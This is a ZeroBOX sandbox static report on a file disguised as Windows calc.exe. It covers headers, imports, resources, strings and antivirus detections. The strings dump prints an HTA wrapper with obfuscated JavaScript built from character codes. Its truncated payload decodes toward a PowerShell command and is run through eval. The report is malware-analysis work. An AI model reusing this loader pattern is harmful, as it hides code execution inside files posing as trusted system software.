Static | ZeroBOX

PE Compile Time

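2060-09-09 09:59:42 (a future date, so not a usable build time: the PE header timestamp is set by whoever produced the file, and reproducibly built Windows 10 system binaries carry a hash-derived value in this field)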

PDB Path

calc.pdb

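PE Imphash (a hash of the import table only; it does not cover the HTA and script fragments visible in the strings dump further down, so a match against a known-good calc.exe imphash says nothing about that content)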

ba072a972fe6c47c8cf7a0347bb0af7a

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000f2c 0x00001000 5.68989879931
.data 0x00002000 0x0000039c 0x00000200 0.24044503451
.idata 0x00003000 0x000004a8 0x00000600 4.06427258161
.rsrc 0x00004000 0x00004708 0x00004800 2.81175464817
.reloc 0x00009000 0x0000015c 0x00000200 4.69869222346

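Resources (the File type column is a libmagic guess from each resource's leading bytes; the "dBase IV DBT" label on the RT_ICON rows is most likely a misread of icon bitmap data, whose 40-byte header size shows up as "next free block index 40", not an embedded database)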

Name Offset Size Language Sub-language File type
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_GROUP_ICON 0x000086c8 0x0000003e LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x00004670 0x00000384 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x000041e0 0x0000048f LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library SHELL32.dll:
0x403038 ShellExecuteW
Library KERNEL32.dll:
0x403014 GetCurrentProcess
0x403018 TerminateProcess
0x403020 GetCurrentProcessId
0x403024 GetCurrentThreadId
0x40302c GetTickCount
Library msvcrt.dll:
0x403058 _amsg_exit
0x40305c __p__fmode
0x403060 __setusermatherr
0x403064 _initterm
0x403068 _wcmdln
0x40306c ?terminate@@YAXXZ
0x403070 _controlfp
0x403074 _exit
0x403078 exit
0x40307c __p__commode
0x403080 _XcptFilter
0x403084 __set_app_type
0x40308c __wgetmainargs
0x403090 _cexit
Library ADVAPI32.dll:
0x403000 EventSetInformation
0x403004 EventWriteTransfer
0x403008 EventRegister
Library api-ms-win-core-synch-l1-2-0.dll:
0x403050 Sleep
Library api-ms-win-core-processthreads-l1-1-0.dll:
0x403048 GetStartupInfoW
Library api-ms-win-core-libraryloader-l1-2-0.dll:
0x403040 GetModuleHandleW

!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
<script>
dv=102;EA=117;RG=110;ng=99;Yx=116;fu=105;Hu=111;TA=32;BM=118;Na=98;FX=40;fl=67;Ax=104;iE=97;HH=41;CZ=123;mQ=114;QH=73;TJ=74;uA=120;nl=61;ug=34;Ou=59;Ig=115;lT=121;se=48;hV=60;JF=46;QS=108;zU=101;Yj=103;YQ=43;vF=79;Hr=77;dM=83;hr=109;RN=100;mT=91;dy=93;WG=45;oB=56;Sn=52;PX=51;sQ=125;GL=68;qA=57;Ka=53;bE=44;Md=54;lI=50;mR=55;mA=49;NU=107;jq=112;bS=119;vs=65;fW=88;Rk=106;BX=82;var xon = String.fromCharCode(dv,EA,RG,ng,Yx,fu,Hu,RG,TA,BM,Na,Hu,FX,fl,Ax,iE,HH,CZ,BM,iE,mQ,TA,QH,TJ,uA,nl,TA,ug,ug,Ou,dv,Hu,mQ,TA,FX,BM,iE,mQ,TA,Ig,Yx,lT,TA,nl,TA,se,Ou,TA,Ig,Yx,lT,TA,hV,TA,fl,Ax,iE,JF,QS,zU,RG,Yj,Yx,Ax,Ou,TA,Ig,Yx,lT,YQ,YQ,HH,TA,CZ,BM,iE,mQ,TA,Ax,vF,Hr,TA,nl,TA,dM,Yx,mQ,fu,RG,Yj,JF,dv,mQ,Hu,hr,fl,Ax,iE,mQ,fl,Hu,RN,zU,FX,fl,Ax,iE,mT,Ig,Yx,lT,dy,TA,WG,TA,oB,Sn,PX,HH,Ou,QH,TJ,uA,TA,nl,TA,QH,TJ,uA,TA,YQ,TA,Ax,vF,Hr,sQ,mQ,zU,Yx,EA,mQ,RG,TA,QH,TJ,uA,sQ,Ou,BM,iE,mQ,TA,TJ,mQ,GL,TA,nl,TA,BM,Na,Hu,FX,mT,qA,Ka,Ka,bE,qA,Ka,Sn,bE,qA,Md,lI,bE,qA,Sn,Sn,bE,qA,Ka,mR,bE,qA,Ka,oB,bE,qA,Sn,mR,bE,qA,Sn,Sn,bE,qA,Ka,mA,bE,qA,Ka,mA,bE,oB,oB,qA
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
<script>
eval(xon)
window.close();
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
Antivirus Signature
Bkav W32.Common.19D0AB1D
Lionic Trojan.Win32.Generic.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Script
Skyhigh RDN/Generic.dx
ALYac Gen:Variant.Strictor.288077
Cylance unsafe
Zillya Clean
Sangfor Trojan.Win32.Agent.V1md
K7AntiVirus Clean
Alibaba Trojan:Script/Generic.2831657c
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec Trojan Horse
Elastic Clean
ESET-NOD32 Clean
APEX Clean
Avast Win32:Malware-gen
Cynet Clean
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Strictor.288077
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Strictor.288077
Tencent Clean
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Strictor.288077
TrendMicro Clean
Trapmine Clean
FireEye Gen:Variant.Strictor.288077
Emsisoft Gen:Variant.Strictor.288077 (B)
SentinelOne Clean
GData Gen:Variant.Strictor.288077
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Strictor.D4654D
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Znyonm
Varist Clean
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic.dx
MAX malware (ai score=89)
VBA32 Clean
Malwarebytes Generic.Malware/Suspicious
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Generic!8.C3 (CLOUD)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet W32/PossibleThreat
BitDefenderTheta Clean
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_60% (D)
alibabacloud Trojan:Multi/Strictor
No IRMA results available.